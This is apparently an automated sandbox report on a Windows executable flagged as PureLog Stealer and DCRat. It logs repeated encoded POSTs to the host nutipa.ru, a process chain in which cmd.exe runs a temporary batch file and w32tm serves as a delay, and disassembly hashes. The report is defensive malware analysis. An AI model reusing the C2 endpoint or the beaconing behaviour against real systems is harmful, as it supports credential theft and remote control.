                                                            Data Raw: 39 38 0d 0a 06 1f 3a 01 36 29 3e 57 23 58 33 0c 3a 3c 00 0e 3f 30 34 06 24 31 25 10 24 06 37 5d 2a 3d 38 0e 32 00 2d 1c 22 32 29 50 2b 37 00 02 32 0c 21 51 03 11 22 58 32 10 27 05 3e 00 2b 06 24 32 2f 14 31 2e 38 14 28 28 00 50 27 01 24 0e 23 2e 0a 50 2e 03 24 5a 28 14 23 5b 2e 00 22 13 20 36 2e 53 0c 17 25 11 3c 29 08 5f 23 21 21 55 30 02 33 57 20 29 00 55 2a 30 28 1e 27 0a 24 0c 27 10 3f 08 36 0e 04 09 32 14 29 07 20 0c 0c 1e 3e 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98:6)>W#X3:<?04$1%$7]*=82-"2)P+72!Q"X2'>+$2/1.8((P'$#.P.$Z(#[." 6.S%<)_#!!U03W )U*0('$'?62) >%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            82192.168.2.449848104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:08.465217113 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:08.810574055 CET2536OUTData Raw: 55 54 43 5b 5f 57 5d 52 5d 5a 56 51 50 50 57 55 55 53 5e 44 5a 57 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UTC[_W]R]ZVQPPWUUS^DZW[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$)=Y)6<[!,71>&&%>U/'=+3=W,+.F'#P
                                                            Dec 15, 2024 19:38:09.552788973 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:09.799356937 CET795INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0ae1IMmbVfmFPcnVJK8L1tcOJ%2B6uA6bFAcMwIBjBv0rsANZXbES1h2Gc956vz31iWXymz42aD1fwM4Dpif%2FT2J04xx3M3yaqZO5nqz3urISDqP6og8cf0%2Byp7k%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c8ccd018ce9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7115&min_rtt=2016&rtt_var=10954&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=34104&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            83192.168.2.449849104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:10.038223028 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:38:10.388631105 CET2532OUTData Raw: 50 56 46 5c 5a 5a 58 53 5d 5a 56 51 50 58 57 51 55 54 5e 48 5a 52 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVF\ZZXS]ZVQPXWQUT^HZR[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y')->:!Z:@+4/$2->_1:>030=&^+3),.F'#P /
                                                            Dec 15, 2024 19:38:11.135191917 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:11.386907101 CET793INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxSkXC%2FTdwNi7v9MhTtrg5UyM3uAmYHUAzfy7RabBQIuCedPODWHo4aXUPzQVWi1wLA5GhFmcvRQuAQJSnMP9XhwnYxh0p8j8iMx8m95GpAs67CWkce%2BrMpfouA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c969ebcc342-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3065&min_rtt=1660&rtt_var=3434&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2828&delivery_rate=113116&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            84192.168.2.449850104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:11.632988930 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:11.982456923 CET2536OUTData Raw: 55 55 43 5c 5f 59 58 57 5d 5a 56 51 50 5d 57 51 55 51 5e 46 5a 54 5b 5b 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUC\_YXW]ZVQP]WQUQ^FZT[[\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(==#X6<=+4#<('=&\'-:( 3_3+U!U,.F'#P 3
                                                            Dec 15, 2024 19:38:12.721189976 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:12.956275940 CET792INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XWd8J7GwQChJw5BxePY5pA5jnQ8uz5OAxQhhpPw28VeGPqz3mA%2FZOkOh%2B4bGDEYpZxuF5nDLaCXGieW9x9vUiKsQSQanIAOrU6tHEDhyBaoWe7u4Y2nJdXmEEVA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ca08fa8185d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3947&min_rtt=2336&rtt_var=4099&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=95876&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            85192.168.2.449851104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:38:13.198107958 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:13.545295000 CET2532OUTData Raw: 55 57 46 5d 5f 58 5d 51 5d 5a 56 51 50 58 57 54 55 5d 5e 40 5a 56 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWF]_X]Q]ZVQPXWTU]^@ZV[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\<!*#\"6@(=#7'%&^%=!*;3>Y<1R,.F'#P
                                                            Dec 15, 2024 19:38:14.289156914 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:14.524080038 CET792INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6dCjlwrGwVJZDoY0HivOlRWYSdibdYcPkTfJvW5YGX%2BaFrdsq822zzqCtrHoP3pjaiD5NCB4t3w4x8fcdyVb1KdHgerpfA%2FtHIQfWYfXFgdHyKAUQfMhDYzrF5U%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288caa5cf7de95-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4480&min_rtt=1546&rtt_var=6448&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=58350&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:13:36:08
                                                            Start date:15/12/2024
                                                            Path:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\150bIjWiGH.exe"
                                                            Imagebase:0xfc0000
                                                            File size:3'700'736 bytes
                                                            MD5 hash:E7870CD0C30A52066C454C15A5A5A2F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1674964023.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:13:36:13
                                                            Start date:15/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat"
                                                            Imagebase:0x7ff67f270000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:13:36:13
                                                            Start date:15/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:13:36:13
                                                            Start date:15/12/2024
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff658cc0000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:13:36:13
                                                            Start date:15/12/2024
                                                            Path:C:\Windows\System32\w32tm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                            Imagebase:0x7ff78b140000
                                                            File size:108'032 bytes
                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:13:36:18
                                                            Start date:15/12/2024
                                                            Path:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\150bIjWiGH.exe"
                                                            Imagebase:0x720000
                                                            File size:3'700'736 bytes
                                                            MD5 hash:E7870CD0C30A52066C454C15A5A5A2F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FFD9B870B3F Relevance: 3.8, Strings: 3, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1748584705.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b870000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9
                                                              • API String ID: 0-3426396564
                                                              • Opcode ID: 712e323a924ceee505ca82d6d5bd0b8dc8b48628d44a1f581e4b56de0924764e
                                                              • Instruction ID: 42d2932959ade73bd5b9740773d251323e065d11c21b3d7fbd9c72ea29cc615c
                                                              • Opcode Fuzzy Hash: 712e323a924ceee505ca82d6d5bd0b8dc8b48628d44a1f581e4b56de0924764e
                                                              • Instruction Fuzzy Hash: 2001497B71E4069FD300AA7DFC908D97B4CEBC923974601B7E444C7162E210145EC3E0
                                                              Function 00007FFD9BC31698 Relevance: 2.0, Strings: 1, Instructions: 733COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758353353.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bc30000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: c83420f3c20b995e7bbed5d83a152cfbd8a68fd3d1c7f0610006ca60bb909ec0
                                                              • Instruction ID: 13da84a996581fc8b5acbbfd5751608d240309a3cd649af5cc26bc72da5da1d9
                                                              • Opcode Fuzzy Hash: c83420f3c20b995e7bbed5d83a152cfbd8a68fd3d1c7f0610006ca60bb909ec0
                                                              • Instruction Fuzzy Hash: 66223530A1DB0A4FD759DF68D8A197573E0FF96314B5841BAD08EC72ABD928F8438781
                                                              Function 00007FFD9BFCD25A Relevance: 1.9, Strings: 1, Instructions: 672COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: R^L
                                                              • API String ID: 0-2311395007
                                                              • Opcode ID: 9b7372c234f40e8c31701c2a4341143b26ddb717529508afff7962aa275a6bd6
                                                              • Instruction ID: 6030aee719d4062322724df339c358b735737bf2f7546ebd3ec801965177cd97
                                                              • Opcode Fuzzy Hash: 9b7372c234f40e8c31701c2a4341143b26ddb717529508afff7962aa275a6bd6
                                                              • Instruction Fuzzy Hash: 4E229734B19A1D8FDBA8EF48C895A7873E1FF54314B1142B9D00EC76A6DE25ED85CB80
                                                              Function 00007FFD9BC3F255 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758353353.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bc30000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C@
                                                              • API String ID: 0-1236912586
                                                              • Opcode ID: f766e155ab5d6bf9060edc2709c49b0a886fbd5c49d0f547d346ad29953f56b3
                                                              • Instruction ID: 961ddc722b91b86c048dbc05c4415da2d7c2e2393dbc3153a919852e30fb2669
                                                              • Opcode Fuzzy Hash: f766e155ab5d6bf9060edc2709c49b0a886fbd5c49d0f547d346ad29953f56b3
                                                              • Instruction Fuzzy Hash: 62A1A7306196598FEB59CF68C4E05B837A1FF48310B9546BDD85BCB69BC638F981CB80
                                                              Function 00007FFD9B870940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1748584705.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9b870000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: dO_H
                                                              • API String ID: 0-2883779980
                                                              • Opcode ID: 3a378f0f24ccbeda7a6ed73e10333c7a48f57494c50df3749290b3d9e8012690
                                                              • Instruction ID: 391e3949657409d82a829a83ce0d751b28b2832d1f7ec087315a5d5949257933
                                                              • Opcode Fuzzy Hash: 3a378f0f24ccbeda7a6ed73e10333c7a48f57494c50df3749290b3d9e8012690
                                                              • Instruction Fuzzy Hash: DE51C331B1CB044FD758DB1CA89A67977E1EB9D714F15017EE489C32A2DA35AC428AC2
                                                              Function 00007FFD9BFC5F98 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: fa8df09677c31607c80c8f6874e4b034ef88f905f806364d0622ec29c4bb1ff0
                                                              • Instruction ID: 9536e06491ca505931e9f894bf3212d4a8b46ea194db05df80b0ae59abfd2924
                                                              • Opcode Fuzzy Hash: fa8df09677c31607c80c8f6874e4b034ef88f905f806364d0622ec29c4bb1ff0
                                                              • Instruction Fuzzy Hash: B2519E30E0D64E9FDB69EFD8C4615BDB7B1EF54300F1142BAC01AE7292CA396945CB50
                                                              Function 00007FFD9BC383D8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758353353.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bc30000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 6400a80c29888633da53ee1c358e44ee5345f5777a3229fdd6c2b9c2ba89175a
                                                              • Instruction ID: 6367d2df9a549f5e059b04426c3bea3a7937e73b698ceefbde288a1815b6142d
                                                              • Opcode Fuzzy Hash: 6400a80c29888633da53ee1c358e44ee5345f5777a3229fdd6c2b9c2ba89175a
                                                              • Instruction Fuzzy Hash: 22517C71E0964E9FEB59DBA8D4605FCB7B1FF49300F5140BAD01AE72D2DA386A02CB40
                                                              Function 00007FFD9BFCF048 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 394a10629f9188efc03a996764f465097b32ffd0c1d2232b90a38a7c26d2d899
                                                              • Instruction ID: cd323c2e2f4b01f1fca2f19643e99a2aa54b91e2104cdf07a91d9fe519efc70d
                                                              • Opcode Fuzzy Hash: 394a10629f9188efc03a996764f465097b32ffd0c1d2232b90a38a7c26d2d899
                                                              • Instruction Fuzzy Hash: 7E514931E0960E8FDB69EF98D4645BDB7B1EF44300F1142AAC01AE72A6CA356A46CB40
                                                              Function 00007FFD9BC3EEC8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758353353.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bc30000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 2d2c9b49c4c92023c3f549c0a094ce80f6151d4167b3fd32b81ef5568912acd0
                                                              • Instruction ID: 4f49cf690a02489385d148241e95758cd35afa66a1edd7cf600465d47b88122c
                                                              • Opcode Fuzzy Hash: 2d2c9b49c4c92023c3f549c0a094ce80f6151d4167b3fd32b81ef5568912acd0
                                                              • Instruction Fuzzy Hash: 32516E31E0964E8FDB58DBA8C8A19FDB7B1EF48300F5140BAD01AE7292DA356A05CB50
                                                              Function 00007FFD9BC31649 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758353353.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bc30000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M
                                                              • API String ID: 0-3664761504
                                                              • Opcode ID: 42c0fc80c24b95292aa0bf918d5fd123425104d9211970f42010ef081131a819
                                                              • Instruction ID: c126722dfedc7bb90ba90fdfb3d2e6a6e778b855eeeb20c7b94ea10f915da7a6
                                                              • Opcode Fuzzy Hash: 42c0fc80c24b95292aa0bf918d5fd123425104d9211970f42010ef081131a819
                                                              • Instruction Fuzzy Hash: 8BE06D6160E7C48FC71AAA74886D455BFA0EF6721174A42EEC045CF1A7EA2D8885C701
                                                              Function 00007FFD9BFC3F10 Relevance: .7, Instructions: 686COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0caed6d3f3340ca61807f01bc2a9bc0925307a2e7dc1b3ce9026398d1e0b28d7
                                                              • Instruction ID: 6dae08fa45bdb9bdc5a178486406b1188b5d622e6c4efe77519ed907e3df211f
                                                              • Opcode Fuzzy Hash: 0caed6d3f3340ca61807f01bc2a9bc0925307a2e7dc1b3ce9026398d1e0b28d7
                                                              • Instruction Fuzzy Hash: 0D229630B19A1D8FDBA8EF48C865AB877E1FF94310B5142BDD41DC72A2DE25AD85CB40
                                                              Function 00007FFD9BFCC217 Relevance: .3, Instructions: 345COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07587610207ff8291dbf10c1e343f76d7b9306b04ca1eb6a5cba9f53da584293
                                                              • Instruction ID: 6ce2358a3fc61ae46655b1c07d2f375bfa5e21a95fb7a2201ce58eccf0a9c5d6
                                                              • Opcode Fuzzy Hash: 07587610207ff8291dbf10c1e343f76d7b9306b04ca1eb6a5cba9f53da584293
                                                              • Instruction Fuzzy Hash: E9B16931A0D54D4FE778FEA898265F837D0FF44320B0503BAD09EC75A2DA1AA99687C1
                                                              Function 00007FFD9BFCF2BF Relevance: .3, Instructions: 342COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
